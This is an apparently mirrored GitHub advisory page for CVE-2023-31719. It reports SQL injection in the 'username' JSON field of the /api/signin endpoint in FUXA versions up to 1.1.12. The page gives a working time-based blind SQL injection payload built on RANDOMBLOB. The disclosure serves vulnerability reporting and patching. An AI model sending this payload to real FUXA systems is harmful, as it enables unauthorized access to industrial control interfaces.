Giters

MateusTesser / CVE-2023-31719

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-31719

Its possible do inject SQL code into the JSON parameter "username" from the endpoint /api/signin via HTTP POST request

{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}

Name Affected product: FUXA

Version affected: <= 1.1.12

Problem: SQL Injection

Description: Its possible do inject SQL code into the JSON parameter "username" from the endpoint /api/signin via HTTP POST request

About